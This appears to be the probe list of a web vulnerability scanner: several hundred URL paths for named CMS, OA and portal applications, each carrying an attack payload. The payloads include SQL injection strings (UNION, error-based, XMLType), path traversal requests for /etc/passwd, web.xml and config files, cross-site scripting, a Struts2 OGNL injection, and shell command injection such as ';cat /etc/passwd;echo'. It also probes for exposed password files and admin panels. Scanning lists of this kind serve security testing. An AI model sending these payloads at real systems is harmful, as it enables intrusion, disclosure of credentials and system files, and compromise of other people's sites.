/main/model/childcatalog/zxzxinfo.jsp?MailId=13%20UNION%20ALL%20SELECT%20NULL,CHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2859%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29,NULL,NULL,NULL,NULL,NULL,NULL%20--
/main/user/login.asp
/main?xwl=13O1AVUENBSF&dir=@../../WEB-INF/web.xml
/mainpage/msglog.aspx?user=-1'%20and+1=char(106)--
/manage/
/manage/Login.asp
/manage/Login.aspx
/manage/Login.jsp
/manage/Login.php
/manage/Shop/profile/LmUserManage.aspx
/manage/WAP/Other/AddDalen.aspx?menu=add
/manage/Zone/TemplateList.aspx?OpenerText=a');%7Dalert(42873);%7B//
/manage/admin.php
/manage/index.asp
/manage/index.aspx
/manage/index.jsp
/manage/index.php
/manage/node_article_add2.asp?menu=addnewss&qikan_id=238&node_id=1%20UNION%20ALL%20SELECT%20NULL,NULL,CHR(106)%26CHR(109),NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20MSysAccessObjects%16
/management/status.jsp
/manager.asp
/manager.aspx
/manager.jsp
/manager.php
/manager/
/manager/index.php
/manager/picupload.aspx
/managerNManager.action
/mapi/index.php?act=my_order_update&order_id=1&tel=13912345678&name='%3E(select/**/%201%20from/**/%20(select/**/%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from/**/%20information_schema.tables%20group%20by%20x)a)%23
/mapi/index.php?requestData=eyJrZXl3b3JkIjoiJykgQU5EIChTRUxFQ1QgMSBGUk9NKFNFTEVDVCBDT1VOVCgqKSxDT05DQVQoY29uY2F0KDB4NWMsbWQ1KDB4Nzc2NTYyNzM2MzYxNmUpKSxGTE9PUihSQU5EKDApKjIpKVggRlJPTSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIEdST1VQIEJZIFgpYSkjIiwiYWN0IjoibmVhcmJ5Z29vZHNlcyJ9
/mas/backlog/searchfile.jsp?skey=poc'%20AND%201=CHAR(106)%20--
/mas/component/group.jsp?name=poc'%20AND%201=CHAR(106)%20--
/mas/schedule.jsp?type=group&SGPID=1'+UNION+ALL+SELECT+1,CHAR(98)%2bCHAR(121)%2bCHAR(101)%2bCHAR(58)%2bCHAR(121),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--
/mas/schedule/detailschedule.jsp?bid=poc'%20AND%201=CHAR(106)%20--
/mas/schedule/newschedule.jsp?done=save&treenode=poc'%20AND%201=CHAR(106)%20--
/mas/schedule/schedulelist.jsp?key=poc'%20AND%201=CHAR(106)%20--
/master/
/mdydecoderaction.php?DecoderID=(SELECT+1+and+ROW(1,1)%3E(SELECT+COUNT(*),CONCAT(md5(0x7765627363616e),0x3a,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)
/mdydeviceaction.php?DeviceID=(SELECT+1+and+ROW(1,1)%3E(SELECT+COUNT(*),CONCAT(md5(0x7765627363616e),0x3a,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)&=3&Page=3
/media/magmi/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility
/meetingroom/ShenQingInforDis.asp?OAID=-12%20AND%201993%20IN%20(char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100))%20---
/meida/iWebRevision.jsp?name=0000%22%3E%27%3Cscript%3Ealert%28%2742873%27%29%3C/script%3E;//
/member.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
/member.php?act=index
/member.php?infloat=yes&handlekey=123);alert(/webscan/);//
/member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes&inajax=1&username=360webscan&password=ooxx&quickforward=yes&handlekey=webscan360
/member/
/member/ajax_membergroup.php?action=post&membergroup=@%60'%60%20Union%20select%20concat(0x3336307765627363616e,pwd,0x7c)%20from%20%60%23@__admin%60%20where%201%20or%20id=@%60'%60
/member/index.php
/member/index.php?ugid31=51'%20and%20'1122'='12
/member/special.php?job=show_BBSiframe&type=myatc&id=25&TB_pre=qb_pm%20where%20%201=2%20+union+select+1+from+(select+count(*),concat(floor(rand(0)*2),(select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1))a+from+information_schema.tables+group+by+a)b%23
/members/
/mep-admin/userAction!queryUser.action?start=0&limit=10
/message.php?act=webscan'
/message/mytreedata.asp?bumenid=-12%20AND%201432=CONVERT(INT,(SELECT%20CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100)))--%20&time=&time=
/mfs.cgi
/misc.php?mod=getuserinfo&uid=-1
/misc.php?mod=syscode&pnumber=C%27%20or%20%60%27%60%20%20or%20@%60%27%27%60%20union%20select%201%20from%20%28select%20count%28*%29,concat%28%28select%20database%28%29%29,floor%28rand%280%29*2%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%20%23%20@%60%27%60
/moadmin.php?action=listRows&collection=1&find=array(1);md5(1122);exit
/mobile/goods_list.php?type=1s'%20onmouseover=alert(/ed1e83f8d8d90aa943e4add2ce6a4cbf/)%20//
/mobile/index.asp?act=view&id=1%20union%20select%201,Username%26chr(124)%26CheckCode%20from%20%7Bpre%7Dadmin
/mobile/user.php?act=order_list
/model/TwoGradePage/Equipment_detail.aspx?id=11314%20and%201=(select%2bchar(106))%20--
/model/TwoGradePage/TrainSignUp.aspx?tblApparatusRepertoryListID=12%20and%201=(select%2bchar(106))%20--
/model/TwoGradePage/newsdetail.aspx?id=279&columnId=70%20and%201=(select%2bchar(106))
/model/twogradepage/listSend.aspx?appid=1%20AND%20CHAR(106)=1
/module/AIP/get_file.php?MODULE=/&ATTACHMENT_ID=.._webroot/inc/oa_config&ATTACHMENT_NAME=php
/module/AIP/upload.php?T_ID=1&RUN_ID=1%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/module/download.jsp?filename=..%5CWEB-INF%5Cweb.xml
/module/exceldown.jsp?filename=..%5CWEB-INF%5Cweb.xml
/module/exceldownload.jsp?filename=..%5CWEB-INF%5Cweb.xml
/module/rss/rssfeed.jsp?colid=-1986
/module/sel_seal/get.php?ID=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/module/sitesearch/index.jsp?keyword=&columnid=-1650)%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--%20&keyvalue=&webid=&currpage=2
/module/sitesearch/opr_classajax.jsp?classid=1%20UNION%20ALL%20SELECT%20NULL,CHR(100)%7C%7CCHR(58)%7C%7CCHR(118)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(121)%20FROM%20DUAL--
/module/voting/commonlist.jsp?classid=0&queid=-12)%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(59)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--%20&m=yes&inlay=yes&answer=
/modules/pdflist.aspx?info_id=1/**/union/**/all/**/select/**/null,null,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),null,null,null/**/from/**/dual%20--
/monitoring?part=web.xml
/msgChat/download.jsp?url=msgChat/download.jsp
/myPaper/dk_zxksView.aspx?ksType=0&tID=-12')/**/and/**/1=char(106)--&ecID=1&ModuleID=78
/myadmin/
/myly.aspx?username=test'%20and%20@@version%3E0--
/nameedit.asp?table=bbs&id=1%20union%20all%20select%20null,null,null,null,char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),null%20--&action=edit
/names.nsf
/navigate.do?method=getPolicyinfoDataById&id=2631&menuNo=05'%20and%201=(select%20char(106))%20--
/nd/transfer_nd_data_show.php?cid=-1%20and%201=2%20union%20select%20user(),md5(0x454154)%23
/netflow/servlet/CSVServlet?schFilePath=/etc/passwd
/netflow/servlet/DisplayChartPDF?filename=../../../../boot.ini
/nevercouldexistfilenosec
/nevercouldexistfilenosec.aspx
/nevercouldexistfilenosec.bak
/nevercouldexistfilenosec.php
/nevercouldexistfilenosec.rar
/nevercouldexistfilenosec.shtml
/nevercouldexistfilenosec.zip
/nevercouldexistfilenosec/
/nevercouldexistfilewebsec
/nevercouldexistfilewebsec.aspx
/nevercouldexistfilewebsec.bak
/nevercouldexistfilewebsec.php
/nevercouldexistfilewebsec.rar
/nevercouldexistfilewebsec.shtml
/nevercouldexistfilewebsec.zip
/nevercouldexistfilewebsec/
/news/bencandy.php?Rurl=pre-qb_members%20where%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,0x686B3A693A31393937,0x3a)%20from%20qb_members%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23.html
/news/huiyidetails.aspx?action=serach&id=1%20and%201=char(106)
/news/js.php?type=like&keyword=1%2527)/**/and/**/(select/**/1/**/from/**//**/(select/**/count(*),concat((select/**/concat(0x7e,0x7765627363616E3A693A66696E64,0x7e)/**/from/**/1tc_members/**/limit/**/0,1),floor(rand(0)*2))x/**/from/**//**/information_schema.tables/**/group/**/by/**/x)a)%23
/news/newsInfoAction.shtml?infotype=-1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20and%20'at'='at
/news/news_details.aspx?id=-1&coid=-5%20and%201=char(106)%20--
/news/searchNewsAction.shtml?keywords='%7C%7C(SELECT%20'ijx'%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20dual)))%7C%7C'
/news/shuju/data.mdb
/news_display.php?id=2%20AND%20(SELECT%202358%20FROM(SELECT%20COUNT(*),CONCAT(0x7765627363616E3A,(SELECT%20(CASE%20WHEN%20(2358=2358)%20THEN%201%20ELSE%200%20END)),0x3A66696E643A,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/news_list.php?cat1id=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x686B3A693A31393937,0x333630),NULL%23&cat2id=10&unit_id=1
/news_list.php?cat1id=1&unit_id=1&cat2id=-1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,CONCAT(0x686B3A693A31393937,0x333630),NULL,NULL,NULL,NULL,NULL%23
/newssearch.aspx?skey=1%25'%20and%201=char(106)%20--
/nicknamelogin.jsp
/nobom.php
/nosec_Web_Scanner_Test.dll
/notes.php?action=view&nid=1-websec
/nvabar.php?todo=content&fid=1&m=-1%20UNION%20SELECT%201,2,3,4,concat(0x7c,md5(1122),0x7c),6,7,8,9,10
/oa/download_attach.aspx?attach_id=1'%20and%20(select%20char(106)%2bchar(106))%3E0--
/oa/student/ChengJiGenZong.asp?id='/**/and/**/1=char(106)--&%D3%EF%CE%C4=%D3%EF%CE%C4&%CA%FD%D1%A7=%CA%FD%D1%A7&submit1=%B2%E9%D1%AF
/oa/student/fenduan.asp?selyears=&selgrade=&seltestname=&selsubject='/**/and/**/1=char(106)--&manfen=100&buchang=20&submit1=%B2%E9%D1%AF
/oa/student/mainsubject_zixuan.asp?selyears=&seltestname='/**/and/**/1=char(106)--&selgrade=&selclass=&submit1=%B2%E9%D1%AF&%CC%E5%D3%FD=%CC%E5%D3%FD
/oa_server/App_Pages/App_page/News_add.aspx
/oa_server/App_Pages/App_page/UserSpuerAdd.aspx
/oa_server/App_Pages/App_page/user_list.aspx
/oa_server/App_Pages/App_page/user_update.aspx?userid=172
/oaerp/ui/sync/getContrastData.jsp?ID=-21%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(106)%2bCHAR(58),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20--&type=filed
/oaerp/ui/sync/getSyncInfo.jsp?oneKyeDetailId=11)%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(106)%2bCHAR(58)%2bCHAR(120),NULL%20--&act=oneKeyInfo
/objectbox/selectx_userlist.jsp?fn_Keywords=1'%20UNION%20ALL%20SELECT%20NULL,char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),NULL--%20&perm=&cPage=1&tiao=
/old/
/onlineApply.do?method=initQlxm&depNo=321'%20AND%201122=(SELECT%20UPPER(XMLType(chr(60)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/opac/ajax_get_file.php?filename=../admin/opacadminpwd.php
/opac/ckgc.jsp?kzh=-1')%20UNION%20%20ALL%20SELECT%20%20NULL,NULL,CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--
/opac/index.jsp?page=../web-inf/web.xml
/opacOpenurl/getOpenUrlByBookId/-1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)
/opac_two/application/course_manage2.jsp?action=delete&kechengmingcheng=1%25%27%20AND%207982%3DCONVERT%28INT%2C%28SELECT%20CHAR%28113%29%2bCHAR%28101%29%2bCHAR%2899%29%2bCHAR%28102%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%28115%29%2bCHAR%28107%29%2bCHAR%28118%29%2bCHAR%28113%29%29%29%20AND%20%27%25%27%3D%27
/opr_readfile.jsp?filename=opr_readfile.jsp
/outImg?imgPath=/etc/passwd
/outImg?imgPath=c:/boot.ini
/oxoxoxoxoxoxox.com
/oxoxoxoxoxoxox.com/
/page/html/?360webscan'.html
/pages/Data%20Transmission%20-%20o.php?Lang=../../../../../etc/passwd%00
/pages/collections.php?addsearch=%21last1000&restypes=&archive=0&mode=resources&daylimit=1%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,(MID((IFNULL(CAST(md5(0xe414)%20AS%20CHAR),0x20)),1,50)),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/pages/en/Data%20Transmission.php?Lang=../../../../../etc/passwd%00
/pages/rc_port_config_ui.php?sec=1&prefix=;cat%20/etc/passwd;echo
/pages/search_disk_usage.php?archive=a'%20and%20(SELECT%201%20FROM%20(select%20count(*),concat(floor(rand(0)*2),(SELECT%20md5(1122)%20from%20user%20limit%200,1))a%20from%20information_schema.tables%20group%20by%20a)b)%20and%20'1'='1
/pages/zh/Data%20Transmission.php?Lang=../../../../../etc/passwd%00
/pass.txt
/passwd
/password.txt
/passwords.txt
/pda/auth.php?P=%60%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test
/pf.php?mediafile=/../../../../etc/passwd
/pf/rate.php?id=1%20and%201=2%20UNION%20ALL%20SELECT%20NULL,sha1(0x3336307765627363616e)
/pf/ratemovie.php?id=1%20and%201=2%20UNION%20ALL%20SELECT%20NULL,sha1(0x3336307765627363616e)
/php-ofc-library/ofc_upload_image.php?name=ed1e83f8d8d90aa943e4add2ce6a4cbf.txt
/php/bill/list_userinfo.php?domain=site.org&ok=1&cp=1%20union%20select%20md5(1122),2,3,4,5%23
/php/mailaction1.php?action=x&index=1.2;echo+123456%3Ex1.txt
/php/report/include/config.inc
/php/report/include/ldap.inc
/php/report/include/util.inc
/php/report/lastlogin_list_export.php?time=1%20and%201=2%20union%20select%20md5(1122),2,3%20--%20&stime=hehe
/php/report/search_lastlogin.php?time=1%20and%201=2%20union%20select%20md5(1122),2,3%20--%20&stime=hehe
/phpMyAdmin/
/phpMyAdmin/error.php?type=This+is+a+client+side+hole+evidence&error=Client+side+attack+via+characters+injection[br][a%40http://webscan.360.cn%40]This%20Is%20a%20Link[%2Fa]
/phpMyAdmin/show_config_errors.php
/phpRedisAdmin/?overview
/phpcms/data/js.php?id=1
/phpinfo.php
/phpmyadmin/
/phpsso_server/?m=phpsso&c=index&a=getapplist&appid=1&data=
/phpsso_server/api.php?op=install&username=phpcms&password=reer&url=123&name=123&authkey=123&apifilename=123&charset=123&type=123&synlogin=123
/phpsso_server/api/uc.php?code=dec0Hfdu%2Fkh7g9qSMqxHkpAOUSB7uMJ2pqcxZm6kkdY0xAqAbUaqV3noA56dIyd908KlMSyij9SKQQ3U2gU5uHdUbLHh%2BF7ZnA3mVL2sjK5zXGI
/pic.aspx?classid=60)%20and%201=char(106)%20--
/picnews.asp?%69d=-1%20and%201=2%20union%20select%201,2,3,chr(106),5,6,7,8,9,10,11,12%20from%20admin
/piw/Job/positionDetail.jsp?ID=-1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7c,IFNULL(CAST(md5(0x234445)%20AS%20CHAR),0x20),0x7c),NULL,NULL,NULL,NULL,NULL
/piw/Member/UploadMemberAttach.jsp
/piw/MessageBoard/articleIframe.jsp?DataId=1&Code=2%27and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7c,0x6366726565723A693A6A78,0x7c,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)%23
/piw/MessageBoard/message.jsp?DataId=1&Code=1%27and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7c,md5(0x234445),0x7c,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)%23
/piw/Production/display/productSearch.jsp?keywords=1122'/**/and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7c,0x6366726565723A693A6A78,0x7c,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)/**/and/**/'1'='1
/piw/Question/module/code.jsp?value=1'%20AND%20(SELECT%202554%20FROM(SELECT%20COUNT(*),CONCAT(0x7c,(MID((IFNULL(CAST(md5(0x234445)%20AS%20CHAR),0x20)),1,50)),0x7c,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20AND%20'HgST'='HgST
/piw/Question/module/codebranchs.jsp?value=1'%20AND%20(SELECT%202554%20FROM(SELECT%20COUNT(*),CONCAT(0x7c,(MID((IFNULL(CAST(md5(0x234445)%20AS%20CHAR),0x20)),1,50)),0x7c,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20AND%20'HgST'='HgST
/piw/School/SchoolTypeRegion.jsp?table=information_schema.schemata/**/where/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7c,0x6366726565723A693A6A78,0x7c,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)
/piw/Site/BadWordsExport.jsp?ids=888%20AND%20(SELECT%202798%20FROM(SELECT%20COUNT(*),CONCAT(0x7c,(MID((IFNULL(CAST(md5(0x234445)%20AS%20CHAR),0x20)),1,50)),0x7c,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/piw/Site/KeyWordExport.jsp?ids=-111)%20union%20select%20Username,md5%281122%29,222,4444,5555%20from%20zduser%23
/plan/FloodPlan/FloodPlanFileShow.aspx?ReadOnly=&ID=499'%20AND%203=CHAR(106)%2bCHAR(99)%20--&filetype=156&ParentID=0&adomParameter=292
/plug/collect/AspCms_CollectFun.asp?action=getlinklist&todo=this&CollectID=1%20and%20%202=iif((1=1),2,chr(97))
/plugin.php?id=Network114:Network114&ljtype=1%bf%27
/plugins/?q=area&area_id=-1%20union%20select%201,md5(0x7765627363616e),3,4,5,6%23
/plugins/annotate/pages/get.php?ref=1%27%20AND%20(SELECT%206564%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,(MID((IFNULL(CAST(md5(0xe414)%20AS%20CHAR),0x20)),1,50)),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20AND%20%27a%27=%27a
/plugins/phpdisk_client/passport.php?YWN0aW9uPXBhc3Nwb3J0bG9naW4mdXNlcm5hbWU9MSZwYXNzd29yZD0xJnNpZ249NjdBMTAwNDc5QTQ4OTMyOUEzMTIxRUM0QTM2M0FBNzcmdHBmPXBkX3VzZXJzIHdoZXJlIGdpZD0xIGFuZCAoYXNjaWkoc3Vic3RyaW5nKChzZWxlY3QgdXNlcm5hbWUgZnJvbSBwZF91c2VycyB3aGVyZSBnaWQ9MSBsaW1pdCAwLDEpLDEsMSkpPTk4KSBsaW1pdCAwLDEj
/plugins/qmail/MailTo.aspx?mail=1%27and%02CHAR(106)%2bCHAR(39)%3E0%02and%02%271%27=%271
/plugins/weathermap/weathermap-cacti-plugin.php
/plus/
/plus/Ajaxs.asp?action=GetRelativeItem&Key=goingta%2525%2527%2529%2520%2575%256E%2569%256F%256E%2520%2573%2565%256C%2565%2563%2574%25201,2,username%252B%2527%257C%2527%252Bpassword%20from%20KS_Admin%2500
/plus/Promotion.asp
/plus/ad_js.php?aid=1&nocache=1
/plus/ajax_common.php?act=hotword&query=%E9%8C%A6%27%20a%3C%3End%201=2%20un%3C%3Eion%20sel%3C%3Eect%201,md5(1122),3%20fr%3C%3Eom%20qs_admin%23
/plus/ajax_officebuilding.php?act=key&key=%E9%8C%A6%27%20a%3C%3End%201=2%20un%3C%3Eion%20sel%3C%3Eect%201,2,3,md5(1122),5,6,7,8,9%23
/plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20UNION%20SELECT%201,2,3,md5%281122%29,5,6,7,8,9%23
/plus/bshare.php?dopost=getcode&uuid=%22%20onload=alert%281%29//
/plus/carbuyaction.php?dopost=return&code=../../index
/plus/carbuyaction.php?dopost=return&code=../../tags
/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=35
/plus/outside.php?id=../template/default/style/yun_index.css%00
/plus/pf/rate.php?id=111%3D@%60%5C'%60+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+sha1(0x3336307765627363616e)),1,62)))a+from+information_schema.tables+group+by+a)b)%23@%60%5C'%60+]=a
/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=%5C'%20%20or%20mid=@%60%5C'%60%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,0x484B3A313A31393937,0x7c)+from+%60%23@__admin%60%20limit+0,1),5,6,7,8,9%23@%60%5C'%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=6878
/plus/recommend.php?aid=1&action=sendmail&title=%3Ciframe%20src=http://xxooxxoo.js%3E
/plus/search.php?typeArr[2%27%20and%20@%60%5C%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28%2a%29%2Cconcat%28floor%28rand%280%29%2a2%29%2C%28substring%28%28Select%20md5%280x7765627363616e%29%29%2C1%2C62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title
/por/login_psw.csp
/portal/WEB-INF/web.xml
/portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd
/portal/getJsonData.action?userId=9090&ruleID=portal-common.getProFileInfo
/portal/group/articl.php?portal_id=3&column_id=3&content_id=184)%20and%20(select%201%20from%20(select%20count(*),concat(0x3a,md5(1122),0x3a)x%20from%20information_schema.tables%20group%20by%20x)a)%20and%20(1)=(1
/portal/logoImgServlet?language=ch&dataCenter=&insId=insId&type=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00
/portal/por_modules_add.jsp?ModuleID=1'%20UNION%20all%20SELECT%20NULL,0x3E5F6F686568655F3C%23
/portal/query_user_password_qustion.aspx?user_name=%20just_test'%20and%201=char(106)%20--
/post.php?action=reply&fid=17&tid=1591&extra=&replysubmit=yes&infloat=yes&handlekey=,prompt(42873)
/post.php?part=input&catid=8%DF%27%20OR%201%20GROUP%20BY%20CONCAT%280x7e21%2Cmd5%280x451545%29%2C0x217e%2CFLOOR%28RAND%280%29%2a2%29%29%20HAVING%20MIN%280%29%20--%20vDZN
/posthistory.php?tel=IiBhbmQoc2VsZWN0IDEgZnJvbShzZWxlY3QgY291bnQoKiksY29uY2F0KChzZWxlY3QgKHNlbGVjdCAoU0VMRUNUIENIQVIoMTAwLCA1NiwgMTAwLCA1NywgNDgsIDk3LCA5NywgNTcsIDUyLCA1MSwgMTAxLCA1MiwgOTcsIDEwMCwgMTAwLCA1MCkpKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgbGltaXQgMCwxKSxmbG9vcihyYW5kKDApKjIpKXggZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIGdyb3VwIGJ5IHgpYSkj
